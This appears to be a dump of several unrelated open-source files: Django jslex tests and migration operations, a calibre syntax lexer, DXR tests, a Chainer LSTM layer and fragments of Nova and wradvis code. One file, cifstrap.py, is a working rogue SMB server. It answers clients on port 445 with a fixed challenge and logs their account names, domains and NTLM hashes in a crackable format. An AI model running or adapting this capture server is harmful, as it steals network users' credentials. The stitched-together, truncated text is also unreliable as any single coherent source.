LOG.debug(_("unplug: instance_uuid=%(uuid)s vif=%(vif)s"),
{'uuid': instance['uuid'], 'vif': vif})
network, mapping = vif
vif_uuid = mapping['vif_uuid']
ctx = context.get_admin_context()
try:
pif = bmdb.bm_interface_get_by_vif_uuid(ctx, vif_uuid)
bmdb.bm_interface_set_vif_uuid(ctx, pif['id'], None)
LOG.debug(_("pif:%(id)s is unplugged (vif_uuid=%(vif_uuid)s)")
% {'id': pif['id'], 'vif_uuid': vif_uuid})
self._after_unplug(instance, network, mapping, pif)
except exception.NovaException:
LOG.warn(_("no pif for vif_uuid=%s") % vif_uuid)
| apache-2.0 |
Batterfii/django | tests/utils_tests/test_jslex.py | 153 | 9837 | # -*- coding: utf-8 -*-
"""Tests for jslex."""
# originally from https://bitbucket.org/ned/jslex
from __future__ import unicode_literals
from django.test import SimpleTestCase
from django.utils.jslex import JsLexer, prepare_js_for_gettext
class JsTokensTest(SimpleTestCase):
LEX_CASES = [
# ids
("a ABC $ _ a123", ["id a", "id ABC", "id $", "id _", "id a123"]),
("\\u1234 abc\\u0020 \\u0065_\\u0067", ["id \\u1234", "id abc\\u0020", "id \\u0065_\\u0067"]),
# numbers
("123 1.234 0.123e-3 0 1E+40 1e1 .123", [
"dnum 123", "dnum 1.234", "dnum 0.123e-3", "dnum 0", "dnum 1E+40",
"dnum 1e1", "dnum .123",
]),
("0x1 0xabCD 0XABcd", ["hnum 0x1", "hnum 0xabCD", "hnum 0XABcd"]),
("010 0377 090", ["onum 010", "onum 0377", "dnum 0", "dnum 90"]),
("0xa123ghi", ["hnum 0xa123", "id ghi"]),
# keywords
("function Function FUNCTION", ["keyword function", "id Function", "id FUNCTION"]),
("const constructor in inherits", ["keyword const", "id constructor", "keyword in", "id inherits"]),
("true true_enough", ["reserved true", "id true_enough"]),
# strings
(''' 'hello' "hello" ''', ["string 'hello'", 'string "hello"']),
(r""" 'don\'t' "don\"t" '"' "'" '\'' "\"" """, [
r"""string 'don\'t'""", r'''string "don\"t"''', r"""string '"'""",
r'''string "'"''', r"""string '\''""", r'''string "\""'''
]),
(r'"ƃuıxǝ⅂ ʇdıɹɔsɐʌɐſ\""', [r'string "ƃuıxǝ⅂ ʇdıɹɔsɐʌɐſ\""']),
# comments
("a//b", ["id a", "linecomment //b"]),
("/****/a/=2//hello", ["comment /****/", "id a", "punct /=", "dnum 2", "linecomment //hello"]),
("/*\n * Header\n */\na=1;", ["comment /*\n * Header\n */", "id a", "punct =", "dnum 1", "punct ;"]),
# punctuation
("a+++b", ["id a", "punct ++", "punct +", "id b"]),
# regex
(r"a=/a*/,1", ["id a", "punct =", "regex /a*/", "punct ,", "dnum 1"]),
(r"a=/a*[^/]+/,1", ["id a", "punct =", "regex /a*[^/]+/", "punct ,", "dnum 1"]),
(r"a=/a*\[^/,1", ["id a", "punct =", r"regex /a*\[^/", "punct ,", "dnum 1"]),
(r"a=/\//,1", ["id a", "punct =", r"regex /\//", "punct ,", "dnum 1"]),
# next two are from http://www.mozilla.org/js/language/js20-2002-04/rationale/syntax.html#regular-expressions
("""for (var x = a in foo && "</x>" || mot ? z:/x:3;x<5;y</g/i) {xyz(x++);}""",
["keyword for", "punct (", "keyword var", "id x", "punct =", "id a", "keyword in",
"id foo", "punct &&", 'string "</x>"', "punct ||", "id mot", "punct ?", "id z",
"punct :", "regex /x:3;x<5;y</g", "punct /", "id i", "punct )", "punct {",
"id xyz", "punct (", "id x", "punct ++", "punct )", "punct ;", "punct }"]),
("""for (var x = a in foo && "</x>" || mot ? z/x:3;x<5;y</g/i) {xyz(x++);}""",
["keyword for", "punct (", "keyword var", "id x", "punct =", "id a", "keyword in",
"id foo", "punct &&", 'string "</x>"', "punct ||", "id mot", "punct ?", "id z",
"punct /", "id x", "punct :", "dnum 3", "punct ;", "id x", "punct <", "dnum 5",
"punct ;", "id y", "punct <", "regex /g/i", "punct )", "punct {",
"id xyz", "punct (", "id x", "punct ++", "punct )", "punct ;", "punct }"]),
# Various "illegal" regexes that are valid according to the std.
(r"""/????/, /++++/, /[----]/ """, ["regex /????/", "punct ,", "regex /++++/", "punct ,", "regex /[----]/"]),
# Stress cases from http://stackoverflow.com/questions/5533925/what-javascript-constructs-does-jslex-incorrectly-lex/5573409#5573409 # NOQA
(r"""/\[/""", [r"""regex /\[/"""]),
(r"""/[i]/""", [r"""regex /[i]/"""]),
(r"""/[\]]/""", [r"""regex /[\]]/"""]),
(r"""/a[\]]/""", [r"""regex /a[\]]/"""]),
(r"""/a[\]]b/""", [r"""regex /a[\]]b/"""]),
(r"""/[\]/]/gi""", [r"""regex /[\]/]/gi"""]),
(r"""/\[[^\]]+\]/gi""", [r"""regex /\[[^\]]+\]/gi"""]),
("""
rexl.re = {
NAME: /^(?![0-9])(?:\w)+|^"(?:[^"]|"")+"/,
UNQUOTED_LITERAL: /^@(?:(?![0-9])(?:\w|\:)+|^"(?:[^"]|"")+")\[[^\]]+\]/,
QUOTED_LITERAL: /^'(?:[^']|'')*'/,
NUMERIC_LITERAL: /^[0-9]+(?:\.[0-9]*(?:[eE][-+][0-9]+)?)?/,
SYMBOL: /^(?:==|=|<>|<=|<|>=|>|!~~|!~|~~|~|!==|!=|!~=|!~|!|&|\||\.|\:|,|\(|\)|\[|\]|\{|\}|\?|\:|;|@|\^|\/\+|\/|\*|\+|-)/
};
""", # NOQA
["id rexl", "punct .", "id re", "punct =", "punct {",
"id NAME", "punct :", r"""regex /^(?![0-9])(?:\w)+|^"(?:[^"]|"")+"/""", "punct ,",
"id UNQUOTED_LITERAL", "punct :", r"""regex /^@(?:(?![0-9])(?:\w|\:)+|^"(?:[^"]|"")+")\[[^\]]+\]/""",
"punct ,",
"id QUOTED_LITERAL", "punct :", r"""regex /^'(?:[^']|'')*'/""", "punct ,",
"id NUMERIC_LITERAL", "punct :", r"""regex /^[0-9]+(?:\.[0-9]*(?:[eE][-+][0-9]+)?)?/""", "punct ,",
"id SYMBOL", "punct :", r"""regex /^(?:==|=|<>|<=|<|>=|>|!~~|!~|~~|~|!==|!=|!~=|!~|!|&|\||\.|\:|,|\(|\)|\[|\]|\{|\}|\?|\:|;|@|\^|\/\+|\/|\*|\+|-)/""", # NOQA
"punct }", "punct ;"
]),
("""
rexl.re = {
NAME: /^(?![0-9])(?:\w)+|^"(?:[^"]|"")+"/,
UNQUOTED_LITERAL: /^@(?:(?![0-9])(?:\w|\:)+|^"(?:[^"]|"")+")\[[^\]]+\]/,
QUOTED_LITERAL: /^'(?:[^']|'')*'/,
NUMERIC_LITERAL: /^[0-9]+(?:\.[0-9]*(?:[eE][-+][0-9]+)?)?/,
SYMBOL: /^(?:==|=|<>|<=|<|>=|>|!~~|!~|~~|~|!==|!=|!~=|!~|!|&|\||\.|\:|,|\(|\)|\[|\]|\{|\}|\?|\:|;|@|\^|\/\+|\/|\*|\+|-)/
};
str = '"';
""", # NOQA
["id rexl", "punct .", "id re", "punct =", "punct {",
"id NAME", "punct :", r"""regex /^(?![0-9])(?:\w)+|^"(?:[^"]|"")+"/""", "punct ,",
"id UNQUOTED_LITERAL", "punct :", r"""regex /^@(?:(?![0-9])(?:\w|\:)+|^"(?:[^"]|"")+")\[[^\]]+\]/""",
"punct ,",
"id QUOTED_LITERAL", "punct :", r"""regex /^'(?:[^']|'')*'/""", "punct ,",
"id NUMERIC_LITERAL", "punct :", r"""regex /^[0-9]+(?:\.[0-9]*(?:[eE][-+][0-9]+)?)?/""", "punct ,",
"id SYMBOL", "punct :", r"""regex /^(?:==|=|<>|<=|<|>=|>|!~~|!~|~~|~|!==|!=|!~=|!~|!|&|\||\.|\:|,|\(|\)|\[|\]|\{|\}|\?|\:|;|@|\^|\/\+|\/|\*|\+|-)/""", # NOQA
"punct }", "punct ;",
"id str", "punct =", """string '"'""", "punct ;",
]),
(r""" this._js = "e.str(\"" + this.value.replace(/\\/g, "\\\\").replace(/"/g, "\\\"") + "\")"; """,
["keyword this", "punct .", "id _js", "punct =", r'''string "e.str(\""''', "punct +", "keyword this",
"punct .", "id value", "punct .", "id replace", "punct (", r"regex /\\/g", "punct ,", r'string "\\\\"',
"punct )",
"punct .", "id replace", "punct (", r'regex /"/g', "punct ,", r'string "\\\""', "punct )", "punct +",
r'string "\")"', "punct ;"]),
]
def make_function(input, toks):
def test_func(self):
lexer = JsLexer()
result = ["%s %s" % (name, tok) for name, tok in lexer.lex(input) if name != 'ws']
self.assertListEqual(result, toks)
return test_func
for i, (input, toks) in enumerate(JsTokensTest.LEX_CASES):
setattr(JsTokensTest, "test_case_%d" % i, make_function(input, toks))
GETTEXT_CASES = (
(
r"""
a = 1; /* /[0-9]+/ */
b = 0x2a0b / 1; // /[0-9]+/
c = 3;
""",
r"""
a = 1; /* /[0-9]+/ */
b = 0x2a0b / 1; // /[0-9]+/
c = 3;
"""
), (
r"""
a = 1.234e-5;
/*
* /[0-9+/
*/
b = .0123;
""",
r"""
a = 1.234e-5;
/*
* /[0-9+/
*/
b = .0123;
"""
), (
r"""
x = y / z;
alert(gettext("hello"));
x /= 3;
""",
r"""
x = y / z;
alert(gettext("hello"));
x /= 3;
"""
), (
r"""
s = "Hello \"th/foo/ere\"";
s = 'He\x23llo \'th/foo/ere\'';
s = 'slash quote \", just quote "';
""",
r"""
s = "Hello \"th/foo/ere\"";
s = "He\x23llo \'th/foo/ere\'";
s = "slash quote \", just quote \"";
"""
), (
r"""
s = "Line continuation\
continued /hello/ still the string";/hello/;
""",
r"""
s = "Line continuation\
continued /hello/ still the string";"REGEX";
"""
), (
r"""
var regex = /pattern/;
var regex2 = /matter/gm;
var regex3 = /[*/]+/gm.foo("hey");
""",
r"""
var regex = "REGEX";
var regex2 = "REGEX";
var regex3 = "REGEX".foo("hey");
"""
), (
r"""
for (var x = a in foo && "</x>" || mot ? z:/x:3;x<5;y</g/i) {xyz(x++);}
for (var x = a in foo && "</x>" || mot ? z/x:3;x<5;y</g/i) {xyz(x++);}
""",
r"""
for (var x = a in foo && "</x>" || mot ? z:"REGEX"/i) {xyz(x++);}
for (var x = a in foo && "</x>" || mot ? z/x:3;x<5;y<"REGEX") {xyz(x++);}
"""
), (
"""
\\u1234xyz = gettext('Hello there');
""", r"""
Uu1234xyz = gettext("Hello there");
"""
)
)
class JsToCForGettextTest(SimpleTestCase):
pass
def make_function(js, c):
def test_func(self):
self.assertMultiLineEqual(prepare_js_for_gettext(js), c)
return test_func
for i, pair in enumerate(GETTEXT_CASES):
setattr(JsToCForGettextTest, "test_case_%d" % i, make_function(*pair))
| bsd-3-clause |
ashang/calibre | src/calibre/gui2/tweak_book/editor/syntax/javascript.py | 14 | 3917 | #!/usr/bin/env python2
# vim:fileencoding=utf-8
from __future__ import (unicode_literals, division, absolute_import,
print_function)
__license__ = 'GPL v3'
__copyright__ = '2014, Kovid Goyal <kovid at kovidgoyal.net>'
import re
from pygments.lexer import RegexLexer, default, include
from pygments.token import Comment, Punctuation, Number, Keyword, Text, String, Operator, Name
import pygments.unistring as uni
from calibre.gui2.tweak_book.editor.syntax.pygments_highlighter import create_highlighter
JS_IDENT_START = ('(?:[$_' + uni.combine('Lu', 'Ll', 'Lt', 'Lm', 'Lo', 'Nl') +
']|\\\\u[a-fA-F0-9]{4})')
JS_IDENT_PART = ('(?:[$' + uni.combine('Lu', 'Ll', 'Lt', 'Lm', 'Lo', 'Nl',
'Mn', 'Mc', 'Nd', 'Pc') +
u'\u200c\u200d]|\\\\u[a-fA-F0-9]{4})')
JS_IDENT = JS_IDENT_START + '(?:' + JS_IDENT_PART + ')*'
class JavascriptLexer(RegexLexer):
"""
For JavaScript source code. This is based on the pygments JS highlighter,
bu that does not handle multi-line comments in streaming mode, so we had to
modify it.
"""
flags = re.UNICODE | re.MULTILINE
tokens = {
b'commentsandwhitespace': [
(r'\s+', Text),
(r'<!--', Comment),
(r'//.*?$', Comment.Single),
(r'/\*', Comment.Multiline, b'comment')
],
b'comment': [
(r'[^*/]+', Comment.Multiline),
(r'\*/', Comment.Multiline, b'#pop'),
(r'[*/]', Comment.Multiline),
],
b'slashstartsregex': [
include(b'commentsandwhitespace'),
(r'/(\\.|[^[/\\\n]|\[(\\.|[^\]\\\n])*])+/'
r'([gim]+\b|\B)', String.Regex, b'#pop'),
(r'(?=/)', Text, (b'#pop', b'badregex')),
default(b'#pop')
],
b'badregex': [
(r'\n', Text, b'#pop')
],
b'root': [
(r'\A#! ?/.*?\n', Comment), # shebang lines are recognized by node.js
(r'^(?=\s|/|<!--)', Text, b'slashstartsregex'),
include(b'commentsandwhitespace'),
(r'\+\+|--|~|&&|\?|:|\|\||\\(?=\n)|'
r'(<<|>>>?|==?|!=?|[-<>+*%&|^/])=?', Operator, b'slashstartsregex'),
(r'[{(\[;,]', Punctuation, b'slashstartsregex'),
(r'[})\].]', Punctuation),
(r'(for|in|while|do|break|return|continue|switch|case|default|if|else|'
r'throw|try|catch|finally|new|delete|typeof|instanceof|void|yield|'
r'this)\b', Keyword, b'slashstartsregex'),
(r'(var|let|with|function)\b', Keyword.Declaration, b'slashstartsregex'),
(r'(abstract|boolean|byte|char|class|const|debugger|double|enum|export|'
r'extends|final|float|goto|implements|import|int|interface|long|native|'
r'package|private|protected|public|short|static|super|synchronized|throws|'
r'transient|volatile)\b', Keyword.Reserved),
(r'(true|false|null|NaN|Infinity|undefined)\b', Keyword.Constant),
(r'(Array|Boolean|Date|Error|Function|Math|netscape|'
r'Number|Object|Packages|RegExp|String|sun|decodeURI|'
r'decodeURIComponent|encodeURI|encodeURIComponent|'
r'Error|eval|isFinite|isNaN|parseFloat|parseInt|document|this|'
r'window)\b', Name.Builtin),
(JS_IDENT, Name.Other),
(r'[0-9][0-9]*\.[0-9]+([eE][0-9]+)?[fd]?', Number.Float),
(r'0x[0-9a-fA-F]+', Number.Hex),
(r'[0-9]+', Number.Integer),
(r'"(\\\\|\\"|[^"])*"', String.Double),
(r"'(\\\\|\\'|[^'])*'", String.Single),
]
}
Highlighter = create_highlighter('JavascriptHighlighter', JavascriptLexer)
if __name__ == '__main__':
from calibre.gui2.tweak_book.editor.widget import launch_editor
launch_editor(P('viewer/images.js'), syntax='javascript')
| gpl-3.0 |
gartung/dxr | dxr/plugins/python/tests/test_imports/test_imports.py | 9 | 2924 | from dxr.testing import DxrInstanceTestCase
class ImportTests(DxrInstanceTestCase):
def test_bases_from_import(self):
"""Make sure the bases: filter matches base classes imported
from another file using `from x import y`.
"""
self.found_line_eq('bases:child.FromImportChildClass',
'class <b>ParentClass</b>(object):', 1)
def test_bases_from_import_alias(self):
"""Make sure the bases: filter matches base classes imported
from another file using `from x import y as z`.
"""
self.found_line_eq('bases:child.FromImportAsChildClass',
'class <b>ParentClass</b>(object):', 1)
def test_bases_import(self):
"""Make sure the bases: filter matches base classes imported
from another file using `import x`.
"""
self.found_line_eq('bases:child.ImportChildClass',
'class <b>ParentClass</b>(object):', 1)
def test_bases_import_as(self):
"""Make sure the bases: filter matches base classes imported
from another file using `import x as y`.
"""
self.found_line_eq('bases:child.ImportAsChildClass',
'class <b>ParentClass</b>(object):', 1)
def test_bases_relative_import(self):
"""Make sure the bases: filter matches base classes imported
from another file using `from . import x`.
"""
self.found_line_eq('bases:child.RelativeImportChildClass',
'class <b>ParentClass</b>(object):', 1)
def test_derived(self):
"""Make sure the derived: filter matches child classes that
import from another file in a variety of ways.
"""
self.found_lines_eq('derived:parent.ParentClass', [
('class <b>FromImportChildClass</b>(ParentClass):', 8),
('class <b>ImportChildClass</b>(parent.ParentClass):', 12),
('class <b>FromImportAsChildClass</b>(PClass):', 16),
('class <b>ImportAsChildClass</b>(blarent.ParentClass):', 20),
('class <b>RelativeImportChildClass</b>(carent.ParentClass):', 24),
])
# Edge cases for the code in `package`.
def test_submodule_import_from(self):
"""Make sure we handle `from package import submodule` as
well as `import package.submodule`.
"""
self.found_lines_eq('derived:package.submodule.MyClass', [
('class <b>FirstDerivedFromSubmodule</b>(submodule.MyClass):', 4),
('class <b>SecondDerivedFromSubmodule</b>(package.submodule.MyClass):', 9),
])
def test_submodule_name_collision(self):
"""Make sure we handle `from package.sub import sub`."""
self.found_line_eq('derived:package.test_import_name_collision.MyClass',
'class <b>DerivedFromInaccessibleClass</b>(MyClass):', 24)
| mit |
rogerhu/django | django/db/migrations/operations/models.py | 5 | 9571 | from .base import Operation
from django.utils import six
from django.db import models, router
from django.db.models.options import normalize_unique_together
from django.db.migrations.state import ModelState
class CreateModel(Operation):
"""
Create a model's table.
"""
def __init__(self, name, fields, options=None, bases=None):
self.name = name
self.fields = fields
self.options = options or {}
self.bases = bases or (models.Model,)
def state_forwards(self, app_label, state):
state.models[app_label, self.name.lower()] = ModelState(app_label, self.name, self.fields, self.options, self.bases)
def database_forwards(self, app_label, schema_editor, from_state, to_state):
app_cache = to_state.render()
model = app_cache.get_model(app_label, self.name)
if router.allow_migrate(schema_editor.connection.alias, model):
schema_editor.create_model(model)
def database_backwards(self, app_label, schema_editor, from_state, to_state):
app_cache = from_state.render()
model = app_cache.get_model(app_label, self.name)
if router.allow_migrate(schema_editor.connection.alias, model):
schema_editor.delete_model(model)
def describe(self):
return "Create model %s" % (self.name, )
def references_model(self, name, app_label=None):
strings_to_check = [self.name]
# Check we didn't inherit from the model
for base in self.bases:
if isinstance(base, six.string_types):
strings_to_check.append(base.split(".")[-1])
# Check we have no FKs/M2Ms with it
for fname, field in self.fields:
if field.rel:
if isinstance(field.rel.to, six.string_types):
strings_to_check.append(field.rel.to.split(".")[-1])
# Now go over all the strings and compare them
for string in strings_to_check:
if string.lower() == name.lower():
return True
return False
def __eq__(self, other):
return (
(self.__class__ == other.__class__) and
(self.name == other.name) and
(self.options == other.options) and
(self.bases == other.bases) and
([(k, f.deconstruct()[1:]) for k, f in self.fields] == [(k, f.deconstruct()[1:]) for k, f in other.fields])
)
class DeleteModel(Operation):
"""
Drops a model's table.
"""
def __init__(self, name):
self.name = name
def state_forwards(self, app_label, state):
del state.models[app_label, self.name.lower()]
def database_forwards(self, app_label, schema_editor, from_state, to_state):
app_cache = from_state.render()
model = app_cache.get_model(app_label, self.name)
if router.allow_migrate(schema_editor.connection.alias, model):
schema_editor.delete_model(model)
def database_backwards(self, app_label, schema_editor, from_state, to_state):
app_cache = to_state.render()
model = app_cache.get_model(app_label, self.name)
if router.allow_migrate(schema_editor.connection.alias, model):
schema_editor.create_model(model)
def references_model(self, name, app_label=None):
return name.lower() == self.name.lower()
def describe(self):
return "Delete model %s" % (self.name, )
class RenameModel(Operation):
"""
Renames a model.
"""
def __init__(self, old_name, new_name):
self.old_name = old_name
self.new_name = new_name
def state_forwards(self, app_label, state):
state.models[app_label, self.new_name.lower()] = state.models[app_label, self.old_name.lower()]
state.models[app_label, self.new_name.lower()].name = self.new_name
del state.models[app_label, self.old_name.lower()]
def database_forwards(self, app_label, schema_editor, from_state, to_state):
old_app_cache = from_state.render()
new_app_cache = to_state.render()
old_model = old_app_cache.get_model(app_label, self.old_name)
new_model = new_app_cache.get_model(app_label, self.new_name)
if router.allow_migrate(schema_editor.connection.alias, new_model):
schema_editor.alter_db_table(
new_model,
old_model._meta.db_table,
new_model._meta.db_table,
)
def database_backwards(self, app_label, schema_editor, from_state, to_state):
old_app_cache = from_state.render()
new_app_cache = to_state.render()
old_model = old_app_cache.get_model(app_label, self.new_name)
new_model = new_app_cache.get_model(app_label, self.old_name)
if router.allow_migrate(schema_editor.connection.alias, new_model):
schema_editor.alter_db_table(
new_model,
old_model._meta.db_table,
new_model._meta.db_table,
)
def references_model(self, name, app_label=None):
return (
name.lower() == self.old_name.lower() or
name.lower() == self.new_name.lower()
)
def describe(self):
return "Rename model %s to %s" % (self.old_name, self.new_name)
class AlterModelTable(Operation):
"""
Renames a model's table
"""
def __init__(self, name, table):
self.name = name
self.table = table
def state_forwards(self, app_label, state):
state.models[app_label, self.name.lower()].options["db_table"] = self.table
def database_forwards(self, app_label, schema_editor, from_state, to_state):
old_app_cache = from_state.render()
new_app_cache = to_state.render()
old_model = old_app_cache.get_model(app_label, self.name)
new_model = new_app_cache.get_model(app_label, self.name)
if router.allow_migrate(schema_editor.connection.alias, new_model):
schema_editor.alter_db_table(
new_model,
old_model._meta.db_table,
new_model._meta.db_table,
)
def database_backwards(self, app_label, schema_editor, from_state, to_state):
return self.database_forwards(app_label, schema_editor, from_state, to_state)
def references_model(self, name, app_label=None):
return name.lower() == self.name.lower()
def describe(self):
return "Rename table for %s to %s" % (self.name, self.table)
class AlterUniqueTogether(Operation):
"""
Changes the value of index_together to the target one.
Input value of unique_together must be a set of tuples.
"""
def __init__(self, name, unique_together):
self.name = name
unique_together = normalize_unique_together(unique_together)
self.unique_together = set(tuple(cons) for cons in unique_together)
def state_forwards(self, app_label, state):
model_state = state.models[app_label, self.name.lower()]
model_state.options["unique_together"] = self.unique_together
def database_forwards(self, app_label, schema_editor, from_state, to_state):
old_app_cache = from_state.render()
new_app_cache = to_state.render()
old_model = old_app_cache.get_model(app_label, self.name)
new_model = new_app_cache.get_model(app_label, self.name)
if router.allow_migrate(schema_editor.connection.alias, new_model):
schema_editor.alter_unique_together(
new_model,
getattr(old_model._meta, "unique_together", set()),
getattr(new_model._meta, "unique_together", set()),
)
def database_backwards(self, app_label, schema_editor, from_state, to_state):
return self.database_forwards(app_label, schema_editor, from_state, to_state)
def references_model(self, name, app_label=None):
return name.lower() == self.name.lower()
def describe(self):
return "Alter unique_together for %s (%s constraints)" % (self.name, len(self.unique_together))
class AlterIndexTogether(Operation):
"""
Changes the value of index_together to the target one.
Input value of index_together must be a set of tuples.
"""
def __init__(self, name, index_together):
self.name = name
self.index_together = set(tuple(cons) for cons in index_together)
def state_forwards(self, app_label, state):
model_state = state.models[app_label, self.name.lower()]
model_state.options["index_together"] = self.index_together
def database_forwards(self, app_label, schema_editor, from_state, to_state):
old_app_cache = from_state.render()
new_app_cache = to_state.render()
old_model = old_app_cache.get_model(app_label, self.name)
new_model = new_app_cache.get_model(app_label, self.name)
if router.allow_migrate(schema_editor.connection.alias, new_model):
schema_editor.alter_index_together(
new_model,
getattr(old_model._meta, "index_together", set()),
getattr(new_model._meta, "index_together", set()),
)
def database_backwards(self, app_label, schema_editor, from_state, to_state):
return self.database_forwards(app_label, schema_editor, from_state, to_state)
def references_model(self, name, app_label=None):
return name.lower() == self.name.lower()
def describe(self):
return "Alter index_together for %s (%s constraints)" % (self.name, len(self.index_together))
| bsd-3-clause |
cemoody/chainer | chainer/links/connection/lstm.py | 2 | 2516 | from chainer.functions.activation import lstm
from chainer import link
from chainer.links.connection import linear
from chainer import variable
class LSTM(link.Chain):
"""Fully-connected LSTM layer.
This is a fully-connected LSTM layer as a chain. Unlike the
:func:`~chainer.functions.lstm` function, which is defined as a stateless
activation function, this chain holds upward and lateral connections as
child links.
It also maintains *states*, including the cell state and the output
at the previous time step. Therefore, it can be used as a *stateful LSTM*.
Args:
in_size (int): Dimensionality of input vectors.
out_size (int): Dimensionality of output vectors.
Attributes:
upward (chainer.links.Linear): Linear layer of upward connections.
lateral (chainer.links.Linear): Linear layer of lateral connections.
c (chainer.Variable): Cell states of LSTM units.
h (chainer.Variable): Output at the previous timestep.
"""
def __init__(self, in_size, out_size):
super(LSTM, self).__init__(
upward=linear.Linear(in_size, 4 * out_size),
lateral=linear.Linear(out_size, 4 * out_size, nobias=True),
)
self.state_size = out_size
self.reset_state()
def to_cpu(self):
super(LSTM, self).to_cpu()
if self.c is not None:
self.c.to_cpu()
if self.h is not None:
self.h.to_cpu()
def to_gpu(self, device=None):
super(LSTM, self).to_gpu(device)
if self.c is not None:
self.c.to_gpu(device)
if self.h is not None:
self.h.to_gpu(device)
def reset_state(self):
"""Resets the internal state.
It sets None to the :attr:`c` and :attr:`h` attributes.
"""
self.c = self.h = None
def __call__(self, x):
"""Updates the internal state and returns the LSTM outputs.
Args:
x (~chainer.Variable): A new batch from the input sequence.
Returns:
~chainer.Variable: Outputs of updated LSTM units.
"""
lstm_in = self.upward(x)
if self.h is not None:
lstm_in += self.lateral(self.h)
if self.c is None:
xp = self.xp
self.c = variable.Variable(
xp.zeros((len(x.data), self.state_size), dtype=x.data.dtype),
volatile='auto')
self.c, self.h = lstm.lstm(self.c, lstm_in)
return self.h
| mit |
bwall/BAMF | IntegrationQueue/static/cifstrap.py | 1 | 6896 | import socket
import time
import struct
import sys
import threading
import datetime
def PrintLog(message):
message = "[" + str(datetime.datetime.now()) + "] " + message
print message
f = open("hashlog.txt", "a")
f.write(message + "\n")
f.close()
class Handler(threading.Thread):
def __init__(self, conn, addr):
threading.Thread.__init__(self)
self.conn = conn
self.addr = addr
def run(self):
try:
#get negotiate_protocol_request
negotiate_protocol_request = self.conn.recv(1024)
if not negotiate_protocol_request:
self.conn.close()
return
dialect_location = 40
dialect_index = 0
dialect_name = ""
while dialect_location < negotiate_protocol_request.__len__():
dialect_name = ""
while ord(negotiate_protocol_request[dialect_location]) != 0x00:
if ord(negotiate_protocol_request[dialect_location]) != 0x02:
dialect_name += negotiate_protocol_request[dialect_location]
dialect_location += 1
if dialect_name == "NT LM 0.12":
break
dialect_index += 1
dialect_location += 1
#netbios session service
negotiate_protocol_response = "\x00\x00\x00\x51"
#SMB Header
#Server Component
negotiate_protocol_response += "\xff\x53\x4d\x42"
#SMB Command
negotiate_protocol_response += "\x72"
#NT Status
negotiate_protocol_response += "\x00\x00\x00\x00"
#Flags
negotiate_protocol_response += "\x88"
#Flags2
negotiate_protocol_response += "\x01\xc0"
#Process ID High
negotiate_protocol_response += "\x00\x00"
#Signature
negotiate_protocol_response += "\x00\x00\x00\x00\x00\x00\x00\x00"
#Reserved
negotiate_protocol_response += "\x00\x00"
#Tree ID
negotiate_protocol_response += negotiate_protocol_request[28] + negotiate_protocol_request[29]
#Process ID
negotiate_protocol_response += negotiate_protocol_request[30] + negotiate_protocol_request[31]
#User ID
negotiate_protocol_response += negotiate_protocol_request[32] + negotiate_protocol_request[33]
#Multiplex ID
negotiate_protocol_response += negotiate_protocol_request[34] + negotiate_protocol_request[35]
#Negotiate Protocol Response
#Word Count
negotiate_protocol_response += "\x11"
#Dialect Index
negotiate_protocol_response += chr(dialect_index) + "\x00"
#Security Mode
negotiate_protocol_response += "\x03"
#Max Mpx Count
negotiate_protocol_response += "\x02\x00"
#Max VCs
negotiate_protocol_response += "\x01\x00"
#Max Buffer Size
negotiate_protocol_response += "\x04\x11\x00\x00"
#Max Raw Buffer
negotiate_protocol_response += "\x00\x00\x01\x00"
#Session Key
negotiate_protocol_response += "\x00\x00\x00\x00"
#Capabilities
negotiate_protocol_response += "\xfd\xe3\x00\x00"
#System Time
negotiate_protocol_response += "\x00" * 8#struct.pack('L', long(time.time()) * 1000L)
#UTC Offset in minutes
negotiate_protocol_response += "\x00\x00"
#Key Length
negotiate_protocol_response += "\x08"
#Byte Count
negotiate_protocol_response += "\x0c\x00"
#Encryption Key
negotiate_protocol_response += "\x11\x22\x33\x44\x55\x66\x77\x88"
#Primary Domain
negotiate_protocol_response += "\x00\x00"
#Server
negotiate_protocol_response += "\x00\x00"
self.conn.sendall(negotiate_protocol_response)
for x in range(0, 2):
ntlmssp_request = self.conn.recv(1024)
if ntlmssp_request.__len__() < 89 + 32 + 8 + 16:
continue
hmac = ''.join('%02x'%ord(ntlmssp_request[i]) for i in range(89, 89 + 16))
header = ''.join('%02x'%ord(ntlmssp_request[i]) for i in range(89 + 16, 89 + 20))
challenge = ''.join('%02x'%ord(ntlmssp_request[i]) for i in range(89 + 24, 89 + 32 + 8))
tail = ''.join('%02x'%ord(ntlmssp_request[i]) for i in range(89 + 32 + 8, 89 + 32 + 8 + 16))
tindex = 89 + 32 + 8 + 16 + 1
account = ""
while ord(ntlmssp_request[tindex]) != 0x00:
account += chr(ord(ntlmssp_request[tindex]))
tindex += 2
tindex += 2
domain = ""
while ord(ntlmssp_request[tindex]) != 0x00:
domain += chr(ord(ntlmssp_request[tindex]))
tindex += 2
PrintLog(account + "::" + domain + ":1122334455667788:" + hmac + ":" + header + "00000000" + challenge + tail)
#netbios session service
ntlmssp_failed = "\x00\x00\x00\x23"
#SMB Header
#Server Component
ntlmssp_failed += "\xff\x53\x4d\x42"
#SMB Command
ntlmssp_failed += "\x73"
#NT Status
ntlmssp_failed += "\x6d\x00\x00\xc0"
#Flags
ntlmssp_failed += "\x88"
#Flags2
ntlmssp_failed += "\x01\xc8"
#Process ID Hight
ntlmssp_failed += "\x00\x00"
#Signature
ntlmssp_failed += "\x00\x00\x00\x00\x00\x00\x00\x00"
#Reserved
ntlmssp_failed += "\x00\x00"
#Tree ID
ntlmssp_failed += ntlmssp_request[28] + ntlmssp_request[29]
#Process ID
ntlmssp_failed += ntlmssp_request[30] + ntlmssp_request[31]
#User ID
ntlmssp_failed += ntlmssp_request[32] + ntlmssp_request[33]
#Multiplex ID
ntlmssp_failed += ntlmssp_request[34] + ntlmssp_request[35]
#Negotiate Protocol Response
#Word Count
ntlmssp_failed += "\x00\x00\x00"
self.conn.sendall(ntlmssp_failed)
self.conn.close()
except:
pass
HOST = ''
PORT = 445
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((HOST, PORT))
s.listen(1)
while True:
conn, addr = s.accept()
PrintLog('Connected by' + str(addr))
handler = Handler(conn, addr)
handler.start()
| mit |
heistermann/wradvis | wradvis/gui.py | 1 | 3615 | # -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
# Copyright (c) 2016, wradlib Development Team. All Rights Reserved.
# Distributed under the MIT License. See LICENSE.txt for more info.
# -----------------------------------------------------------------------------
#!/usr/bin/env python
from PyQt4 import QtGui, QtCore
# other wradvis imports
from wradvis.glcanvas import RadolanWidget
from wradvis.mplcanvas import MplWidget
from wradvis.properties import PropertiesWidget
from wradvis import utils
